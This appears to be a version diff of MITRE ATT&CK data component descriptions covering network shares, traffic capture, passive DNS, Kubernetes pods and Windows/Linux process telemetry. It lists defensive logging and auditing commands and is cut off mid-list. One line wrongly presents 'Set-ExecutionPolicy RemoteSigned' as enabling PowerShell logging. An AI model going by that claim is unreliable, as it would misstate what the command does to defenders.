| description | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)
*Data Collection Measures:*
- Windows:
- Event ID 5140 – Network Share Object Access Logs every access attempt to a network share.
- Event ID 5145 – Detailed Network Share Object Access Captures granular access control information, including the requesting user, source IP, and access permissions.
- Sysmon Event ID 3 – Network Connection Initiated Helps track SMB connections to suspicious or unauthorized network shares.
- Enable Audit Policy for Network Share Access: `auditpol /set /subcategory:"File Share" /success:enable /failure:enable`
- Enable PowerShell Logging to Detect Unauthorized SMB Access: `Set-ExecutionPolicy RemoteSigned`
- Restrict Network Share Access with Group Policy (GPO): `Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment` Set "Access this computer from the network" to restrict unauthorized accounts.
- Linux/macOS:
- AuditD (`open`, `read`, `write`, `connect` syscalls) Detects access to NFS, CIFS, and SMB network shares.
- Lsof (`lsof | grep nfs` or `lsof | grep smb`) Identifies active network share connections.
- Mount (`mount | grep nfs` or `mount | grep cifs`) Lists currently mounted network shares.
- Enable AuditD for SMB/NFS Access: `auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/share -k network_share_access`
- Monitor Active Network Shares Using Netstat: `netstat -an | grep :445`
- Endpoint Detection & Response (EDR):
- Detects abnormal network share access behavior, such as unusual account usage, large file transfers, or encrypted file activity. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logged network traffic data showing both protocol header and | t | The full packet capture (PCAP) or session data that logs bot |
| body values (ex: PCAP) | | h protocol headers and payload content. This allows analysts |
| | | to inspect command and control (C2) traffic, exfiltration, |
| | | and other suspicious activity within network communications. |
| | | Unlike metadata-based logs, full content analysis enables d |
| | | eeper protocol inspection, payload decoding, and forensic in |
| | | vestigations. *Data Collection Measures:* - Network Packet |
| | | Capture (Full Content Logging) - Wireshark / tcpdump / |
| | | tshark - Full packet captures (PCAP files) for manua |
| | | l analysis or IDS correlation. `tcpdump -i eth0 -w capture.p |
| | | cap` - Zeek (formerly Bro) - Extracts protocol h |
| | | eaders and payload details into structured logs. `echo "rede |
| | | f Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr |
| | | capture.pcap local.zeek` - Suricata / Snort (IDS/IPS wit |
| | | h PCAP Logging) - Deep packet inspection (DPI) with |
| | | signature-based and behavioral analysis. `suricata -c /etc/s |
| | | uricata/suricata.yaml -i eth0 -l /var/log/suricata` - Host-B |
| | | ased Collection - Sysmon Event ID 22 – DNS Query Logging |
| | | , Captures DNS requests made by processes, useful for detect |
| | | ing C2 domains. - Sysmon Event ID 3 – Network Connection |
| | | Initiated, Logs process-to-network connection relationships |
| | | . - AuditD (Linux) – syscall=connect, Monitors outbound |
| | | network requests from processes. `auditctl -a always,exit -F |
| | | arch=b64 -S connect -k network_activity` - Cloud & SaaS Tra |
| | | ffic Collection - AWS VPC Flow Logs / Azure NSG Flow Log |
| | | s / Google VPC Flow Logs, Captures metadata about inbound/ou |
| | | tbound network traffic. - Cloud IDS (AWS GuardDuty, Azur |
| | | e Sentinel, Google Chronicle), Detects malicious activity in |
| | | cloud environments by analyzing network traffic patterns. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
| description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
- Wireshark / tcpdump / tshark
- Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
- Zeek (formerly Bro)
- Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
- Suricata / Snort (IDS/IPS with PCAP Logging)
- Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
- Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
- Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
- AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
- AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
- Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Summarized network packet data, with metrics, such as protoc | t | Summarized network packet data that captures session-level d |
| ol headers and volume (ex: Netflow or Zeek http.log) | | etails such as source/destination IPs, ports, protocol types |
| | | , timestamps, and data volume, without storing full packet p |
| | | ayloads. This is commonly used for traffic analysis, anomaly |
| | | detection, and network performance monitoring. *Data Colle |
| | | ction Measures:* - Network Flow Logs (Metadata Collection) |
| | | - NetFlow - Summarized metadata for network con |
| | | versations (no packet payloads). - sFlow (Sampled Flow L |
| | | ogging) - Captures sampled packets from switches and |
| | | routers. - Used for real-time traffic monitoring an |
| | | d anomaly detection. - Zeek (Bro) Flow Logs - Ze |
| | | ek logs session-level details in logs like conn.log, http.lo |
| | | g, dns.log, etc. - Host-Based Collection - Sysmon Event |
| | | ID 3 – Network Connection Initiated - Logs process-l |
| | | evel network activity, useful for detecting malicious outbou |
| | | nd connections. - AuditD (Linux) – syscall=connect |
| | | - Monitors system calls for network connections. `auditct |
| | | l -a always,exit -F arch=b64 -S connect -k network_activity` |
| | | - Cloud & SaaS Flow Monitoring - AWS VPC Flow Logs |
| | | - Captures metadata for traffic between EC2 instances, s |
| | | ecurity groups, and internet gateways. - Azure NSG Flow |
| | | Logs / Google VPC Flow Logs - Logs ingress/egress tr |
| | | affic for cloud-based resources. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
| description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
- NetFlow
- Summarized metadata for network conversations (no packet payloads).
- sFlow (Sampled Flow Logging)
- Captures sampled packets from switches and routers.
- Used for real-time traffic monitoring and anomaly detection.
- Zeek (Bro) Flow Logs
- Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
- Sysmon Event ID 3 – Network Connection Initiated
- Logs process-level network activity, useful for detecting malicious outbound connections.
- AuditD (Linux) – syscall=connect
- Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
- AWS VPC Flow Logs
- Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
- Azure NSG Flow Logs / Google VPC Flow Logs
- Logs ingress/egress traffic for cloud-based resources. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: OS API Execution
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Operating system function/method calls executed by a process | t | Calls made by a process to operating system-provided Applica |
| | | tion Programming Interfaces (APIs). These calls are essentia |
| | | l for interacting with system resources such as memory, file |
| | | s, and hardware, or for performing system-level tasks. Monit |
| | | oring these calls can provide insight into a process's inten |
| | | t, especially if the process is malicious. *Data Collection |
| | | Measures:* - Endpoint Detection and Response (EDR) Tools: |
| | | - Leverage tools to monitor API execution behaviors at t |
| | | he process level. - Example: Sysmon Event ID 10 captures |
| | | API call traces for process access and memory allocation. - |
| | | Process Monitor (ProcMon): - Use ProcMon to collect det |
| | | ailed logs of process and API activity. ProcMon can provide |
| | | granular details on API usage and identify malicious behavio |
| | | r during analysis. - Windows Event Logs: - Use Event IDs |
| | | from Windows logs for specific API-related activities: |
| | | - Event ID 4688: A new process has been created (can ind |
| | | irectly infer API use). - Event ID 4657: A registry |
| | | value has been modified (to monitor registry-altering APIs). |
| | | - Dynamic Analysis Tools: - Tools like Cuckoo Sandbox, |
| | | Flare VM, or Hybrid Analysis monitor API execution during ma |
| | | lware detonation. - Host-Based Logs: - On Linux/macOS sy |
| | | stems, leverage audit frameworks (e.g., `auditd`, `strace`) |
| | | to capture and analyze system call usage that APIs map to. - |
| | | Runtime Monitors: - Runtime security tools like Falco c |
| | | an monitor system-level calls for API execution. - Debugging |
| | | and Tracing: - Use debugging tools like gdb (Linux) or |
| | | WinDbg (Windows) for deep tracing of API executions in real |
| | | time. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21T15:41:36.287Z | 2025-04-18T15:10:31.145Z |
| description | Operating system function/method calls executed by a process | Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Leverage tools to monitor API execution behaviors at the process level.
- Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
- Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
- Use Event IDs from Windows logs for specific API-related activities:
- Event ID 4688: A new process has been created (can indirectly infer API use).
- Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
- Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
- On Linux/macOS systems, leverage audit frameworks (e.g., `auditd`, `strace`) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
- Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
- Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Domain Name: Passive DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logged domain name system (DNS) data highlighting timelines | t | "Domain Name: Passive DNS" captures logged historical and re |
| of domain to IP address resolutions (ex: passive DNS) | | al-time domain name system (DNS) data. This includes records |
| | | of domain-to-IP address resolutions over time, enabling ana |
| | | lysts to track the evolution of domain infrastructure, uncov |
| | | er historical patterns of use, and detect malicious activiti |
| | | es tied to domains and their associated IP addresses. Exampl |
| | | es: - Historical Resolutions - Shared IP Usage - Temporal |
| | | Patterns - Malicious Domain Clustering - Historical Lookback |
| | | This data component can be collected through the following |
| | | measures: - Passive DNS Platforms: Use platforms that spec |
| | | ialize in passive DNS collection and analysis: - Tools: F |
| | | arsight DNSDB, RiskIQ PassiveTotal, PassiveDNS. - Threat Int |
| | | elligence Feeds: Integrate passive DNS data from commercial |
| | | or open-source threat intelligence providers. - Custom DNS C |
| | | ollectors: Deploy custom tools to capture DNS traffic at the |
| | | network level for analysis. - Cloud DNS Services: Leverage |
| | | cloud DNS services (e.g., AWS Route 53, Azure DNS) that main |
| | | tain DNS query logs. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:16:31.390Z |
| description | Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS) | "Domain Name: Passive DNS" captures logged historical and real-time domain name system (DNS) data. This includes records of domain-to-IP address resolutions over time, enabling analysts to track the evolution of domain infrastructure, uncover historical patterns of use, and detect malicious activities tied to domains and their associated IP addresses. Examples:
- Historical Resolutions
- Shared IP Usage
- Temporal Patterns
- Malicious Domain Clustering
- Historical Lookback
This data component can be collected through the following measures:
- Passive DNS Platforms: Use platforms that specialize in passive DNS collection and analysis:
- Tools: Farsight DNSDB, RiskIQ PassiveTotal, PassiveDNS.
- Threat Intelligence Feeds: Integrate passive DNS data from commercial or open-source threat intelligence providers.
- Custom DNS Collectors: Deploy custom tools to capture DNS traffic at the network level for analysis.
- Cloud DNS Services: Leverage cloud DNS services (e.g., AWS Route 53, Azure DNS) that maintain DNS query logs. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new pod (ex: kubectl apply|run) | t | The initial deployment or instantiation of a new pod in a co |
| | | ntainerized environment. This includes creating a pod manual |
| | | ly, through orchestration tools (Kubernetes), or via Infrast |
| | | ructure-as-Code (IaC) configurations. A Pod is the smallest |
| | | deployable unit in Kubernetes, typically containing one or m |
| | | ore containers. Creation methods include: - Direct pod deplo |
| | | yment (`kubectl run`, `kubectl apply`) - Automated deploymen |
| | | t via CI/CD pipelines (e.g., ArgoCD, Jenkins, GitOps) - Infr |
| | | astructure-as-Code (IaC) templates (e.g., Terraform, Helm Ch |
| | | arts) - API-based deployments via Kubernetes control plane ( |
| | | create_pod API calls) - Pods can be ephemeral (short-lived) |
| | | or persistent (part of a StatefulSet or Deployment). *Data |
| | | Collection Measures:* - Kubernetes Audit Logs - Capture |
| | | s all API requests, including pod `create` events. - Kube-ap |
| | | i server Logs - Monitors API calls related to pod dep |
| | | loyments and modifications. Related Events: `PodSandboxChang |
| | | ed`, `SyncLoop`, `Created pod` - Container Runtime Logs |
| | | - Logs from CRI-O, containerd, or Docker capture pod creati |
| | | on events. Related Events: `container start`, `container cre |
| | | ate` - Cloud Provider Logs - GKE, EKS, AKS logs provid |
| | | e insights into Kubernetes API interactions. - SIEM & Log Ag |
| | | gregation - Integrates Kubernetes logs into SIEM solu |
| | | tions. - EDR/XDR Solutions - Monitors container-ba |
| | | sed activity for anomalous pod creations. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:38.124Z |
| description | Initial construction of a new pod (ex: kubectl apply|run) | The initial deployment or instantiation of a new pod in a containerized environment. This includes creating a pod manually, through orchestration tools (Kubernetes), or via Infrastructure-as-Code (IaC) configurations. A Pod is the smallest deployable unit in Kubernetes, typically containing one or more containers. Creation methods include:
- Direct pod deployment (`kubectl run`, `kubectl apply`)
- Automated deployment via CI/CD pipelines (e.g., ArgoCD, Jenkins, GitOps)
- Infrastructure-as-Code (IaC) templates (e.g., Terraform, Helm Charts)
- API-based deployments via Kubernetes control plane (create_pod API calls)
- Pods can be ephemeral (short-lived) or persistent (part of a StatefulSet or Deployment).
*Data Collection Measures:*
- Kubernetes Audit Logs
- Captures all API requests, including pod `create` events.
- Kube-api server Logs
- Monitors API calls related to pod deployments and modifications. Related Events: `PodSandboxChanged`, `SyncLoop`, `Created pod`
- Container Runtime Logs
- Logs from CRI-O, containerd, or Docker capture pod creation events. Related Events: `container start`, `container create`
- Cloud Provider Logs
- GKE, EKS, AKS logs provide insights into Kubernetes API interactions.
- SIEM & Log Aggregation
- Integrates Kubernetes logs into SIEM solutions.
- EDR/XDR Solutions
- Monitors container-based activity for anomalous pod creations. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | An extracted list of pods within a cluster (ex: kubectl get | t | Extracting a list of running or existing pods within a conta |
| pods) | | inerized cluster environment. Pods are the smallest deployab |
| | | le units in a Kubernetes cluster and typically represent an |
| | | application or workload. Enumeration of pods provides insigh |
| | | t into the structure and state of applications running in th |
| | | e cluster, such as the names of pods, their namespaces, and |
| | | their associated metadata. *Data Collection Measures:* - K |
| | | ubernetes API Server Audit Logs: - Enable Audit Logging |
| | | in Kubernetes to capture API requests, such as GET `/api/v1/ |
| | | pods`. - Container Runtime Logs: - Collect runtime-level |
| | | logs from tools like CRI-O, containerd, or Docker, which mi |
| | | ght show relevant API calls for pod enumeration. - EDR and S |
| | | IEM: - Endpoint Detection and Response (EDR) tools, if c |
| | | onfigured with cluster-level visibility, can monitor user co |
| | | mmands like `kubectl get pods`. - SIEM platforms (e.g., |
| | | Splunk) can ingest Kubernetes API logs to detect enumeration |
| | | patterns. - Host-Based Monitoring: - Monitor processes |
| | | and commands executed on nodes where `kubectl` is installed |
| | | using tools like auditd, Sysmon for Linux, or kernel modules |
| | | . |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:31.773Z |
| description | An extracted list of pods within a cluster (ex: kubectl get pods) | Extracting a list of running or existing pods within a containerized cluster environment. Pods are the smallest deployable units in a Kubernetes cluster and typically represent an application or workload. Enumeration of pods provides insight into the structure and state of applications running in the cluster, such as the names of pods, their namespaces, and their associated metadata.
*Data Collection Measures:*
- Kubernetes API Server Audit Logs:
- Enable Audit Logging in Kubernetes to capture API requests, such as GET `/api/v1/pods`.
- Container Runtime Logs:
- Collect runtime-level logs from tools like CRI-O, containerd, or Docker, which might show relevant API calls for pod enumeration.
- EDR and SIEM:
- Endpoint Detection and Response (EDR) tools, if configured with cluster-level visibility, can monitor user commands like `kubectl get pods`.
- SIEM platforms (e.g., Splunk) can ingest Kubernetes API logs to detect enumeration patterns.
- Host-Based Monitoring:
- Monitor processes and commands executed on nodes where `kubectl` is installed using tools like auditd, Sysmon for Linux, or kernel modules. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Pod: Pod Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a pod, including its settings and/or control | t | Changes made to a pod’s configuration or control data within |
| data (ex: kubectl set|patch|edit) | | a containerized cluster. This can include updating settings |
| | | such as resource limits, environment variables, annotations |
| | | , labels, or even the containers running within the pod. Pod |
| | | modifications are often executed using commands like kubect |
| | | l set, kubectl patch, or kubectl edit. *Data Collection Mea |
| | | sures:* - Kubernetes API Server Audit Logs: - Capture |
| | | all API calls related to pod modification, such as PATCH, PU |
| | | T, or UPDATE methods on v1/pods. - Runtime Security Tools: |
| | | - Tools like Falco, Sysdig, and Kube-bench can monitor po |
| | | d modifications at runtime and alert on policy violations. - |
| | | Container Orchestration Logs: - Monitor events logged b |
| | | y Kubernetes itself (e.g., `kubectl logs -n kube-system kube |
| | | -controller-manager`). - SIEM and EDR Solutions: - Use S |
| | | IEM platforms (e.g., Splunk) to aggregate API server logs an |
| | | d detect patterns of unauthorized or suspicious pod modifica |
| | | tions. - Endpoint Detection and Response (EDR) tools con |
| | | figured with container visibility can monitor commands like |
| | | `kubectl` set or `kubectl patch`. - Host-Based Monitoring: |
| | | - Collect and analyze logs for processes executing `kubec |
| | | tl` commands or interacting with Kubernetes configuration fi |
| | | les (e.g., `.kube/config`). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:17:41.365Z |
| description | Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit) | Changes made to a pod’s configuration or control data within a containerized cluster. This can include updating settings such as resource limits, environment variables, annotations, labels, or even the containers running within the pod. Pod modifications are often executed using commands like kubectl set, kubectl patch, or kubectl edit.
*Data Collection Measures:*
- Kubernetes API Server Audit Logs:
- Capture all API calls related to pod modification, such as PATCH, PUT, or UPDATE methods on v1/pods.
- Runtime Security Tools:
- Tools like Falco, Sysdig, and Kube-bench can monitor pod modifications at runtime and alert on policy violations.
- Container Orchestration Logs:
- Monitor events logged by Kubernetes itself (e.g., `kubectl logs -n kube-system kube-controller-manager`).
- SIEM and EDR Solutions:
- Use SIEM platforms (e.g., Splunk) to aggregate API server logs and detect patterns of unauthorized or suspicious pod modifications.
- Endpoint Detection and Response (EDR) tools configured with container visibility can monitor commands like `kubectl` set or `kubectl patch`.
- Host-Based Monitoring:
- Collect and analyze logs for processes executing `kubectl` commands or interacting with Kubernetes configuration files (e.g., `.kube/config`). |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening of a process by another process, typically to read m | t | Refers to an event where one process attempts to open anothe |
| emory of the target process (ex: Sysmon EID 10) | | r process, typically to inspect or manipulate its memory, ac |
| | | cess handles, or modify execution flow. Monitoring these acc |
| | | ess attempts can provide valuable insight into both benign a |
| | | nd malicious behaviors, such as debugging, inter-process com |
| | | munication (IPC), or process injection. *Data Collection Me |
| | | asures:* - Endpoint Detection and Response (EDR) Tools: |
| | | - EDR solutions that provide telemetry on inter-process ac |
| | | cess and memory manipulation. - Sysmon (Windows): - Even |
| | | t ID 10: Captures process access attempts, including: |
| | | - Source process (initiator) - Target process (vic |
| | | tim) - Access rights requested - Process ID |
| | | correlation - Windows Event Logs: - Event ID 4656 (Audit |
| | | Handle to an Object): Logs access attempts to system object |
| | | s. - Event ID 4690 (Attempted Process Modification): Can |
| | | help identify unauthorized process changes. - Linux/macOS M |
| | | onitoring: - AuditD: Monitors process access through sys |
| | | call tracing (e.g., `ptrace`, `open`, `read`, `write`). |
| | | - eBPF/XDP: Used for low-level monitoring of kernel process |
| | | access. - OSQuery: Query process access behavior via str |
| | | uctured SQL-like logging. - Procmon (Process Monitor) and De |
| | | bugging Tools: - Windows Procmon: Captures real-time pro |
| | | cess interactions. - Linux strace / ptrace: Useful for t |
| | | racking process behavior at the system call level. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:47.199Z |
| description | Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10) | Refers to an event where one process attempts to open another process, typically to inspect or manipulate its memory, access handles, or modify execution flow. Monitoring these access attempts can provide valuable insight into both benign and malicious behaviors, such as debugging, inter-process communication (IPC), or process injection.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDR solutions that provide telemetry on inter-process access and memory manipulation.
- Sysmon (Windows):
- Event ID 10: Captures process access attempts, including:
- Source process (initiator)
- Target process (victim)
- Access rights requested
- Process ID correlation
- Windows Event Logs:
- Event ID 4656 (Audit Handle to an Object): Logs access attempts to system objects.
- Event ID 4690 (Attempted Process Modification): Can help identify unauthorized process changes.
- Linux/macOS Monitoring:
- AuditD: Monitors process access through syscall tracing (e.g., `ptrace`, `open`, `read`, `write`).
- eBPF/XDP: Used for low-level monitoring of kernel process access.
- OSQuery: Query process access behavior via structured SQL-like logging.
- Procmon (Process Monitor) and Debugging Tools:
- Windows Procmon: Captures real-time process interactions.
- Linux strace / ptrace: Useful for tracking process behavior at the system call level. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The initial construction of an executable managed by the OS, | t | Refers to the event in which a new process (executable) is i |
| that may involve one or more tasks or threads. (e.g. Win EI | | nitialized by an operating system. This can involve parent-c |
| D 4688, Sysmon EID 1, cmd.exe > net use, etc.) | | hild process relationships, process arguments, and environme |
| | | ntal variables. Monitoring process creation is crucial for d |
| | | etecting malicious behaviors, such as execution of unauthori |
| | | zed binaries, scripting abuse, or privilege escalation attem |
| | | pts. *Data Collection Measures:* - Endpoint Detection and |
| | | Response (EDR) Tools: - EDRs provide process telemetry, |
| | | tracking execution flows and arguments. - Windows Event Logs |
| | | : - Event ID 4688 (Audit Process Creation): Captures pro |
| | | cess creation with associated parent process. - Sysmon (Wind |
| | | ows): - Event ID 1 (Process Creation): Provides detailed |
| | | logging - Linux/macOS Monitoring: - AuditD (execve sysc |
| | | all): Logs process creation. - eBPF/XDP: Used for low-le |
| | | vel monitoring of system calls related to process execution. |
| | | - OSQuery: Allows SQL-like queries to track process eve |
| | | nts (process_events table). - Apple Endpoint Security Fr |
| | | amework (ESF): Monitors process creation on macOS. - Network |
| | | -Based Monitoring: - Zeek (Bro) Logs: Captures network-b |
| | | ased process execution related to remote shells. - Syslo |
| | | g/OSSEC: Tracks execution of processes on distributed system |
| | | s. - Behavioral SIEM Rules: - Monitor process creation f |
| | | or uncommon binaries in user directories. - Detect proce |
| | | sses with suspicious command-line arguments. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
| description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
- Event ID 1 (Process Creation): Provides detailed logging
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
- eBPF/XDP: Used for low-level monitoring of system calls related to process execution.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures network-based process execution related to remote shells.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a process, or its contents, typically to wri | t | Changes made to a running process, such as writing data into |
| te and/or execute code in the memory of the target process ( | | memory, modifying execution behavior, or injecting code int |
| ex: Sysmon EID 8) | | o an existing process. Adversaries frequently modify process |
| | | es to execute malicious payloads, evade detection, or gain e |
| | | scalated privileges. *Data Collection Measures:* - Endpoi |
| | | nt Detection and Response (EDR) Tools: - EDRs can monito |
| | | r memory modifications and API-level calls. - Sysmon (Window |
| | | s): - Event ID 8 (CreateRemoteThread) – Detects cross-pr |
| | | ocess thread injection, commonly used in process hollowing. |
| | | - Event ID 10 (Process Access) – Detects access attempts |
| | | to another process, often preceding injection attempts. - L |
| | | inux/macOS Monitoring: - AuditD (ptrace, mmap, mprotect |
| | | syscalls): Detects memory modifications and debugging attemp |
| | | ts. - eBPF/XDP: Monitors low-level system calls related |
| | | to process modifications. - OSQuery: The processes table |
| | | can be queried for unusual modifications. - Network-Based M |
| | | onitoring: - Zeek (Bro) Logs: Captures lateral movement |
| | | attempts where adversaries remotely modify a process. - |
| | | Syslog/OSSEC: Monitors logs for suspicious modifications. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:43.915Z |
| description | Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8) | Changes made to a running process, such as writing data into memory, modifying execution behavior, or injecting code into an existing process. Adversaries frequently modify processes to execute malicious payloads, evade detection, or gain escalated privileges.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs can monitor memory modifications and API-level calls.
- Sysmon (Windows):
- Event ID 8 (CreateRemoteThread) – Detects cross-process thread injection, commonly used in process hollowing.
- Event ID 10 (Process Access) – Detects access attempts to another process, often preceding injection attempts.
- Linux/macOS Monitoring:
- AuditD (ptrace, mmap, mprotect syscalls): Detects memory modifications and debugging attempts.
